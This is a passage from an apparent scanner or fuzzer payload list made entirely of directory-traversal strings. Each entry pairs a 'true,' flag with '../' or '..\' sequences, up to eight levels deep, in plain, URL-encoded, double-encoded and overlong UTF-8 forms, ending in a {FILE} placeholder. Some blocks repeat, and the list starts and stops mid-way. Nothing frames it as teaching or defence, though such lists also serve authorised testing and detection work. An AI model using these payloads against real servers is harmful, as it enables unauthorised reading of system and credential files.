"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
"true,..%255c{FILE}",
"true,..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
"true,..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
"true,%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
"true,%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
"true,%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
"true,%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
"true,..%c0%af{FILE}",
"true,..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
"true,%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
"true,%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
"true,..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}",
"true,..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}",
"true,%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}",
"true,%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}",
"true,..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}",
"true,..%%32%66{FILE}",
"true,..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}",
"true,..%%35%63{FILE}",
"true,..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}",
"true,%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}",
"true,%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}",
"true,../{FILE}",
"true,../../{FILE}",
"true,../../../{FILE}",
"true,../../../../{FILE}",
"true,../../../../../{FILE}",
"true,../../../../../../{FILE}",
"true,../../../../../../../{FILE}",
"true,../../../../../../../../{FILE}",
"true,..%2f{FILE}",
"true,..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
"true,%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
"true,%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
"true,..%252f{FILE}",
"true,..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
"true,%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
"true,%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
"true,..\\{FILE}",
"true,..\\..\\{FILE}",
"true,..\\..\\..\\{FILE}",
"true,..\\..\\..\\..\\{FILE}",
